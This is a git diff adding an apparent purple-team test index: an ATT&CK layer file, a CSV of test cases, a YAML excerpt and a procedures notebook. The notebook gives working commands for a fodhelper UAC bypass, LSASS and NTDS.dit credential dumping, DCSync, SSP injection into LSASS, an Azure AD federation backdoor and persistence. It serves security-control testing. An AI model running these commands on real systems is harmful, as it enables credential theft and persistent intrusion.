+            "enabled": false,
+            "techniqueID": "T1587.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1594"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1597"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1597.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1597.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1599"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1599.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1600"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1600.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1600.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1601"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1601.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1601.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1602"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1602.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1602.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1606"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1606.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1606.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1609"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1610"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1611"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1612"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1613"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1614"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1614.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1615"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1619"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1620"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1621"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1622"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1647"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1648"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1649"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1650"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1651"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1652"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1653"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1654"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1656"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1657"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1659"
+        }
+    ]
+}
\ No newline at end of file
diff --git a/ot-index-2024/ot-index-2024-v1.0-notebook.md b/ot-index-2024/ot-index-2024-v1.0-notebook.md
new file mode 100644
index 0000000..f03ce83
--- /dev/null
+++ b/ot-index-2024/ot-index-2024-v1.0-notebook.md
@@ -0,0 +1,534 @@
+# General
+
+# OT
+
+# Initial Access
+
+## MFA Push Spam - General guidance
+
+Push-based MFA systems are susceptible to abuse by attackers because they allow an attacker to send a large volume of MFA requests to a user in order to induce that user to accept the prompt in the hopes it ends the requests.
+
+Spam a target user with MFA approval prompts. Unlike a real-world scenario, this is not meant to test the human response to being inundated with MFA requests but rather the technical security controls for such a situation.
+
+### Guidance
+
+Send at least 10 MFA requests to the target user
+
+### Notes
+
+- If MFA is in place, but it does not use some form of zero-knowledge approval (e.g. push notification accept, SMS accept, etc), then it should be considered a block. For example, if the MFA systems requires entering a one-time code, then it would not be susceptible to this attack and therefore be blocked. If no MFA is enforced, it should be considered not blocked.
+
+## Malicious ISOs - Generic ISO-wrapped payload
+
+ISO archives can be used to deliver malicious payloads while bypassing mark-of-the-web restrictions
+
+Use an ISO to deliver a malicious executable payload
+
+### Prerequisites
+
+1. Payload
+1. ISO containing the payload 
+   1. You can use `mkisofs` to create an ISO:
+   ```
+   bash> mkisofs -J -o {{ iso }} {{ payload }}
+   ```
+
+## Cloud storage sharing - General guidance
+
+### Prerequisites
+
+- Have an account on a cloud storage service that allows sharing files via email
+
+### Guidance
+
+Upload then share a file with a target email address via the service. For example, in Google Drive, right click -> share -> share -> enter email -> enter message -> send.
+
+### Notes
+
+Some cloud storage services perform file scanning of uploaded files for malicious content. Consider uploading the file immediately before sharing to limit the impact on testing.
+
+# Execution
+
+# Defense Evasion
+
+## Malicious kernel driver use - load known-abusable driver
+
+Kernel drivers can be used by attackers for a number of malicious activities, including hiding artifacts and tampering with endpoint security tools.
+
+This bypasses the need for attackers to retrieve legitimate code-signing certificates for a driver they wrote.
+
+### Prerequisites
+
+- Local admin
+- A known-abusable driver. Examples: 
+  - **DBUtil_2_3 (SHA256 - 0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5)**
+  - RTCore64 (SHA256 - 01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd)
+  - IQVM64 (SHA256 - 4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b)
+
+### Guidance
+
+Example loading using sc.exe
+
+```
+cmd> sc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\windows\System32\Drivers\{{ sys_file }} displayname= {{ name }}
+```
+
+### Cleanup
+
+- Is using sc.exe, stop and delete the service then restart the machine
+
+### Notes
+
+Drivers can be found in multiple places, including:
+
+- Directly from vendor sites
+- VirusTotal
+- Aggregators like LOLDrivers and KDU
+  - LOLDrivers: https://github.com/magicsword-io/LOLDrivers/tree/main/drivers
+  - KDU: https://github.com/hfiref0x/KDU/
+
+## UAC Bypass - via fodhelper.exe
+
+User Account Control is not a security control but can cause issues with execution when attempting privileged operations
+
+Move to a high-integrity execution context via fodhelper.exe and a Registry modification. Fodhelper.exe is one of many unpatched methods for bypassing UAC.
+
+### Prerequisites
+
+- Split-token admin account
+
+### Guidance
+
+Check for the existence of the target registry key. If it exists, note the value so that it can be restored after execution.
+
+```
+cmd> reg query HKCU\Software\Classes\ms-settings\Shell\Open\command
+```
+
+Modify the registry key and execute fodhelper.exe to obtain an elevated command prompt:
+
+```
+cmd> 
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+c:\windows\system32\fodhelper.exe
+```
+
+### Cleanup
+
+If the registry existed prior to execution, restore its value:
+
+```
+cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v {{ initial_command }} /f
+```
+
+Otherwise, delete the key:
+
+```
+cmd> reg delete HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+```
+
+### References
+
+- https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+- https://4pfsec.com/offensive-windows-fodhelper-exe/
+
+## DLL Side Loading - General guidance
+
+### Notes
+
+- For an up-to-date list of side-loadable DLLs, refer to https://hijacklibs.net/
+
+## DLL Search Order Hijacking - MpCmdRun.exe sideloading
+
+MpCmdRun.exe is susceptible to a DLL sideloading hijack via its dependency on MpClient.dll
+
+### Prerequisites
+
+- A DLL with the appropriate exports called `mpclient.dll`
+  - Use: https://github.com/2XXE-SRA/payload_resources/tree/master/dllsideload/mpclient
+
+### Guidance
+
+Copy `c:\program files\windows defender\mpcmdrun.exe` to the same directory as the `mpclient.dll` payload then run `mpcmdrun.exe`
+
+## Conditional Access Policy Modifications - General guidance
+
+### Notes
+
+- Create a new conditional access policy to avoid modifying production policies. Additionally, consider disabling the policy or setting it to report-only before modifying it. 
+
+# Discovery
+
+# Command and Control
+
+## Remote Assistance Software - General guidance
+
+Access via remote assistance software
+
+Select and use a well-known remote assistance software
+
+### Prerequisites
+
+1. An account for the service
+2. Tool client downloaded and installed
+   1. TeamViewer: https://www.teamviewer.com/
+   2. GoTo Resolve: https://www.goto.com/it-management/resolve
+   3. ConnectWise Control: https://control.connectwise.com/
+
+### Notes
+
+- Where possible, use remote assistance software already in use in the environment
+
+## Remote tool download - General guidance
+
+Transfer tool into environment by downloading from the Internet
+
+### Notes
+
+- The maliciousness level of the binary should align with the intent of the test. For testing signature-based checks, use a known malicious tool, such as Mimikatz. For testing sandboxing or similar network security technologies, use an unknown yet still overtly malicious tool, such as one built around the current attack infrastructure. By default, start with the most malicious choice.
+
+# Lateral Movement
+
+# Persistence
+
+## Scheduled Task Persistence - via schtasks.exe
+
+Use built-in schtasks.exe to persist by creating a scheduled task
+
+### Guidance
+
+```
+CMD> schtasks /Create /SC DAILY /TN "{{ taskname }}" /TR "{{ command }}" /ST 09:00
+```
+
+### Cleanup
+
+```
+CMD> schtasks /delete /tn "{{ taskname }}" /f
+```
+
+## Windows Service Persistence - via sc.exe
+
+Use built-in sc.exe to persist
+
+### Guidance
+
+```
+CMD> sc create {{ service_name }} binPath= "{{ command }}"
+```
+
+### Cleanup
+
+```
+CMD> sc delete {{ service_name }}
+```
+
+## Registry Run Key Persistence - via reg.exe
+
+Use built-in reg.exe to persist via the Registry by setting a command to be run on user login
+
+### Guidance
+
+```
+CMD> reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "{{ key_name }}" /t REG_SZ /F /D "{{ command }}"
+```
+
+### Cleanup
+
+```
+CMD> reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /F /V "{{ key_name }}"
+```
+
+## Persistence in Azure AD - Register a New Device
+
+Register a new device in Azure AD
+
+### Prerequisites
+
+- Azure AD credentials
+- AAD Internals PowerShell module (https://aadinternals.com/aadinternals/#installation)
+  - Install: `PS> install-module aadinternals -scope currentuser`
+  - Import: `PS> import-module aadinternals`
+
+### Guidance
+
+Authenticate to Azure AD and save the token
+
+```
+PS> Get-AADIntAccessTokenForAADJoin -SaveToCache
+```
+
+Register a device: 
+
+```
+PS> Join-AADIntDeviceToAzureAD -DeviceName "{{ device_name }}" -DeviceType "{{ device_type }}" -OSVersion "{{ os_version }}" -JoinType Register
+```
+
+  - This will save a `.pfx` certificate to the current working directory, which is needed for cleanup
+  - Note: The provided values do not need to refer to real characteristics
+
+### Cleanup
+
+Remove the device from Azure AD 
+
+```
+PS> Remove-AADIntDeviceFromAzureAD -PfxFileName {{ pfx_certificate_file }}
+```
+
+## Azure AD Domain Federation - Backdoor via AADInternals
+
+Use AADInternals to create a backdoor federation domain for persisting access to an environment.
+
+### Prerequisites
+
+- Permissions to modify domain authentication settings
+  - and an access token for the user with these permissions, referred to as `$at` in example commands. To retrieve a token, use `$at=Get-AADIntAccessTokenForAADGraph -Credentials (get-credential)` and proceed through the prompts
+- AADInternals installed
+  - `Install-Module AADInternals`
+- A target verified domain in Azure AD
+  - To add a domain, Go to Azure AD -> custom domain names -> add -> set the provided DNS records for your domain -> wait for the verification to compelete
+- A user with an immutable ID set
+  - To set an immutable ID for a user: `Set-AADIntUser -UserPrincipalName {{ upn_or_email }} -ImmutableId "{{ id }}" -AccessToken $at` where the `id` is an arbitrary unnique value
+
+### Guidance
+
+To set the backdoor 
+
+```
+PS> ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "{{ domain }}"
+```
+
+To use the backdoor. This works for any user in the tenant, regardless of their domain.
+
+```
+Open-AADIntOffice365Portal -ImmutableID {{ id }} -UseBuiltInCertificate -ByPassMFA $true -Issuer {{ issuer }}
+```
+
+- `id` is the immutable ID of the target user
+- `issuer` is the IssuerUri provided in the output of the previous command 
+
+### Cleanup
+
+- Delete the domain
+
+### Notes
+
+- The domain must be verified for the backdoor to work
+
+### References
+
+- https://o365blog.com/post/aadbackdoor/
+- https://www.mandiant.com/resources/blog/detecting-microsoft-365-azure-active-directory-backdoors
+
+# Credential Access
+
+## DCSync - via Mimikatz
+
+The DCSync attack mimics normal replication behavior between DCs, allowing for remote extraction of credentials
+
+Uses Mimikatz's lsadump::dcsync command
+
+### Prerequisites
+
+- Command execution in the context of an account with Active Directory replication rights
+- User accounts to target
+- Mimikatz binary (https://github.com/gentilkiwi/mimikatz)
+
+### Guidance
+
+```
+mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ target_username }}
+```
+
+### Troubleshooting
+
+If Mimikatz is giving an error of `ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453)`, try the following:
+
+```
+cmd> klist purge
+cmd> gpupdate /force
+```
+
+## LSASS dumping using comsvcs.dll - via rundll32.exe
+
+Use `rundll32.exe` to call the `MiniDump` export from `comsvcs.dll`
+
+### Prerequisites
+
+- Administrator rights
+- SeDebugPrivilege
+
+### Guidance
+
+```
+shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full
+```
+
+This command must be run from a shell process that has `SeDebugPrivilege` enabled. 
+PowerShell should work to this end. 
+
+You can acquire `SeDebugPrivilege` for `cmd.exe` by launching it as `SYSTEM` via Sysinternals' `PsExec` (`psexec -sid cmd`). 
+Alternatively, you can use the VBScript file from `modexp`: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ (`cscript procdump.vbs lsass.exe`)
+
+### Cleanup
+
+- Delete the dump file
+
+## Extract NTDS.dit Credentials - via ntdsutil.exe
+
+Dump domain hashes for all domain users on the domain controller via ntdsutil.exe, which uses Volume Shadow Services (VSS)
+
+### Prerequisites
+
+- Elevated command execution on a DC
+- Sufficient free disk space on the DC (verify size of ntds.dit file against free disk space)
+
+### Guidance
+
+Note the existing snapshots before dumping NTDS.dit:
+
+```
+cmd> ntdsutil.exe snapshot "list all" quit quit
+```
+
+Dump NTDS.dit using one of the following methods, noting the snapshot number. The output path should be an empty directory:
+
+```
+cmd> ntdsutil “ac in ntds” “ifm” “cr fu {{ output_path }}” q q
+```
+
+### Notes
+
+In the case that ntdsutil is killed during execution (either manually or by an EDR product), the snapshots need to be cleaned up. You cannot do so using vssadmin because they are in use. Delete the snapshot with the following command, using the snapshot number from the dump command in the above guidance:
+
+```
+cmd> ntdsutil.exe snapshot "list all" "delete {{ snapshot_number }}" quit quit
+```
+
+If the command itself is blocked by a security tool, ntdsutil.exe's interactive mode can be used if executing interactively. The commands are the same but should be used one at a time:
+
+```
+cmd> ntdsutil.exe 
+ntdsutil> ac in ntds 
+ntdsutil> ifm 
+ntdsutil> cr fu C:\path\to\ntds-dump
+ntdsutil> q q
+```
+
+### Cleanup
+
+1. Delete the snapshot if necessary (see "Notes" above)
+1. Remove the NTDS.dit copy at the path you specified during execution
+
+## LSASS Security Service Provider - Temporary SSP
+
+Register a Security Service Provider (SSP) for LSASS. This will trigger a DLL load of the SSP into LSASS.
+
+Register an SSP temporarily by calling the AddSecurityPackage() API.
+
+### Prerequisites
+
+- Local administrator 
+- A compiled SSP DLL and a method of calling the AddSecurityPackage() API (e.g. custom exe payload)
+    - SSP source: https://github.com/2XXE-SRA/payload_resources/blob/master/c/lsa_ssp.c
+      - This can be compiled using MinGW via `x86_64-w64-mingw32-gcc -shared -municode -o ssp.dll lsa_ssp.c -lsecur32`
+    - SSP loader: https://github.com/2XXE-SRA/payload_resources/blob/master/powershell/ssp_loader.ps1
+
+### Guidance
+
+Open an administrative PowerShell terminal. 
+
+If using the script linked above, run the following command
+
+```
+PS> .\ssp_loader.ps1 {{ ssp_dll_path }}
+```
+
+If loading manually, first set the path to the compiled SSP DLL into a variable
+
+```
+PS> $DllName = "{{ ssp_dll_path }}"
+```
+
+Then load the SSP into LSASS
+
+```
+PS>
+$DynAssembly = New-Object System.Reflection.AssemblyName('SSPI2')
+$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
+$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SSPI2', $False)
+
+$TypeBuilder = $ModuleBuilder.DefineType('SSPI2.Secur32', 'Public, Class')
+$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('AddSecurityPackage',
+    'secur32.dll',
+    'Public, Static',
+    [Reflection.CallingConventions]::Standard,
+    [Int32],
+    [Type[]] @([String], [IntPtr]),
+    [Runtime.InteropServices.CallingConvention]::Winapi,
+    [Runtime.InteropServices.CharSet]::Auto)
+
+$Secur32 = $TypeBuilder.CreateType()
+
+if ([IntPtr]::Size -eq 4) {
+    $StructSize = 20
+} else {
+    $StructSize = 24
+}
+
+$StructPtr = [Runtime.InteropServices.Marshal]::AllocHGlobal($StructSize)
+[Runtime.InteropServices.Marshal]::WriteInt32($StructPtr, $StructSize)
+
+$Secur32::AddSecurityPackage($DllName, $StructPtr)
+```
+
+### Cleanup
+
+- The SSP will be removed on system reboot or after manually calling DeleteSecurityPackage()
+
+### References
+
+- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+
+# Impact
+
+## GPO Modifications - General guidance
+
+### Notes
+
+- Create a new group policy object to avoid modifying production policies. Additionally, consider disabling the policy before modifying it. 
+
+# Exfiltration
+
+## Exfiltration to cloud storage - General guidance
+
+Select and use a well-known cloud storage service
+
+### Prerequisites
+
+1. An account for the service
+2. Tool client downloaded and installed
+   1. Generic: https://rclone.org/downloads/
+   2. MEGA: https://mega.io/desktop
+   3. Dropbox: https://www.dropbox.com/install
+
+### Notes
+
+- Where possible, use cloud storage service already in use in the environment
+
+## DLP Test - General use
+
+DLP Test (dlptest.com) is a web utility for testing if exfiltration of sensitive data is successful
+
+General usage notes for DLP Test
+
+### Notes
+
+- If sample sensitive data is needed, the site provides it in different types and formats
+- The site supports HTTP, HTTPS, and FTP
+- Do not upload actual sensitive data to the site
+
+# Collection
+
diff --git a/ot-index-2024/ot-index-2024-v1.0-summary.csv b/ot-index-2024/ot-index-2024-v1.0-summary.csv
new file mode 100644
index 0000000..2503706
--- /dev/null
+++ b/ot-index-2024/ot-index-2024-v1.0-summary.csv
@@ -0,0 +1,55 @@
+"Test Case","MITRE ID","Campaign","Description"
+"Replay PCAP for OT service command","T1021","OT","Replay a packet capture of a dangerous OT-specific service commands (e.g. S7 stop) to simulate the traffic for passive OT security controls"
+"Replay PCAP for Triton","T1021","OT","Replay a packet capture of a dangerous Triton malware to simulate the traffic for passive OT security controls"
+"Lateral movement via remote service","T1021","OT","Move laterally to another system using a remote service (e.g. SSH, RDP)"
+"Internal port scan against OT network","T1046","OT","Run internal port scan to probe for interesting OT-specific ports"
+"Network services scan against OT target","T1046","OT","Scan an OT system for OT-specific network services"
+"MQTT C2 over TCP/1883","T1071","OT","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over MQTT"
+"Transfer tool remotely to target","T1570","OT","Copy a payload to a remote target"
+"Remote service login brute force","T1110.001","OT","Attempt to login as a user via a remote service (e.g. SSH, Telnet) using multiple passwords"
+"Prompt a user with multiple MFA requests","T1621","Initial Access","Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt."
+"Attachment - Macro","T1566.001","Initial Access","Send a spearphishing attachment containing a malicious macro payload to a target inbox"
+"Attachment - ISO","T1566.001","Initial Access","Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions."
+"Link - Zipped DLL via sharing","T1566.002","Initial Access","Send a link to a zipped DLL payload stored on a cloud storage service like Google Drive by using the sharing features of that service"
+"Macro - Remote Template","T1221","Execution","Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document"
+"Load known-abusable kernel driver","T1014","Defense Evasion","Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes."
+"DLL execution using Rundll32","T1218.011","Defense Evasion","Execute a malicious DLL's function directly using rundll32"
+"Bypass User Account Control (UAC) via fodhelper","T1548.002","Defense Evasion","Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification"
+"Clear Windows Event Log entries","T1070.001","Defense Evasion","Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs."
+"Sideload a DLL into a legitimate application","T1574.002","Defense Evasion","Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application."
+"Modify identity policy in IdP","T1484","Defense Evasion","Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement."
+"Disable Windows Defender via PowerShell","T1562.001","Defense Evasion","Use PowerShell's Set-MpPreference to disable Windows Defender"
+"Domain Controller discovery via nltest","T1018","Discovery","Use nltest.exe to identify domain controllers in the domain"
+"Enumerate domain groups and users using net","T1087.002","Discovery","Enumerate domain users and domain groups using the builtin net.exe"
+"BloodHound DC enumeration","T1087.002","Discovery","Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller"
+"HTTP C2 over tcp/80","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP"
+"HTTPS C2 over tcp/443","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS"
+"Access via remote assistance tool","T1219","Command and Control","Establish connection to system using a legitimate remote assistance application"
+"Remote tool download over HTTP","T1105","Command and Control","Download a tool from a public hosting location onto the victim system"
+"Lateral Movement via WMI","T1021.003","Lateral Movement","Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system"
+"Lateral Movement via PsExec","T1021.002","Lateral Movement","Move to another system by creating a service remotely via Sysinternals PsExec"
+"Lateral Movement via RDP","T1021.001","Lateral Movement","Perform an interactive logons to a Windows system via RDP"
+"Persist via new scheduled task","T1053.005","Persistence","Persist on a system by creating a new scheduled task"
+"Persist via new Windows service","T1543.003","Persistence","Persist on a system by creating a new service"
+"Persist via Registry Winlogon Shell","T1547.004","Persistence","Run a payload during user login by setting a Registry Winlogon key"
+"Persist via Registry ""Run"" key","T1547.001","Persistence","Run a payload during user login and startup by setting a registry run key"
+"Register a new device in Azure AD","T1098.005","Persistence","Register a new device in Azure AD"
+"Configure a custom federated domain","T1484.002","Persistence","Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant."
+"Extract domain user credentials via replication","T1003.006","Credential Access","Replicate a user's hash from a domain controller using replication APIs (DCSync)."
+"Extract Logonpasswords via Nanodump","T1003.001","Credential Access","Use nanodump to extract credentials from LSASS process memory"
+"Dump LSASS memory using builtin comsvcs.dll","T1003.001","Credential Access","Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk"
+"Dump LSASS memory using Sysinternals ProcDump","T1003.001","Credential Access","Use ProcDump from Sysinternals to dump LSASS process memory"
+"Extract browser cookies","T1555.003","Credential Access","Extract cookie information from the user's browser"
+"Volumetric Kerberoasting","T1558.003","Credential Access","Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set"
+"Extract NTDS credentials via ntdsutil.exe","T1003.003","Credential Access","Dump domain hashes for all domain users on the domain controller via ntdsutil.exe, which uses Volume Shadow Services (VSS)"
+"Enabled WDigest via Registry","T1112","Credential Access","Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory"
+"Register Security Service Provider (SSP) in LSASS","T1547.005","Credential Access","Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS."
+"Encrypt a large amount of files","T1486","Impact","Encrypt a large amount of files on the endpoint to simulate ransomware"
+"Delete backup catalogs with wbadmin.exe","T1490","Impact","Delete native Windows backups"
+"Delete shadows with vssadmin.exe","T1490","Impact","Delete volume shadow copies on the host to inhibit file system recovery"
+"Modify group policy object","T1484.001","Impact","Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems."
+"Extract data to cloud storage service","T1567.002","Exfiltration","Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box"
+"Extract sensitive data over HTTP","T1048.003","Exfiltration","Extract data from the network over HTTP tcp/80 to an external host or IP."
+"Extract sensitive data over HTTP C2","T1041","Exfiltration","Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP"
+"Screen Capture","T1113","Collection","Capture an image of the user's screen"
+"Keylogger","T1056.001","Collection","Log user keystrokes"
diff --git a/ot-index-2024/ot-index-2024-v1.0.yml b/ot-index-2024/ot-index-2024-v1.0.yml
new file mode 100644
index 0000000..5a98534
--- /dev/null
+++ b/ot-index-2024/ot-index-2024-v1.0.yml
@@ -0,0 +1,1096 @@
+OT:
+- name: Replay PCAP for OT service command
+  description: Replay a packet capture of a dangerous OT-specific service commands (e.g. S7 stop) to simulate the traffic for passive OT security controls
+  platforms:
+  guidance:
+  - shell> tcpreplay -i {{ interface }} {{ pcap_file }}
+  block:
+  - ''
+  detect:
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  - Passive network security sensors detect anomalous network traffic
+  controls:
+  - Endpoint Protection
+  - SIEM
+  - ID/PS
+  metadata:
+    id: b7cefb21-5835-478e-8541-b09d15c11948
+    tid: T1021
+    tactic: TA0008
+    x_vectr_id: b7cefb21-5835-478e-8541-b09d15c11948
+    isv: 1
+- name: Replay PCAP for Triton
+  description: Replay a packet capture of a dangerous Triton malware to simulate the traffic for passive OT security controls
+  platforms:
+  guidance:
+  - shell> tcpreplay -i {{ interface }} {{ pcap_file }}
+  block:
+  - ''
+  detect:
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  - Passive network security sensors detect malicious network traffic
+  controls:
+  - Endpoint Protection
+  - SIEM
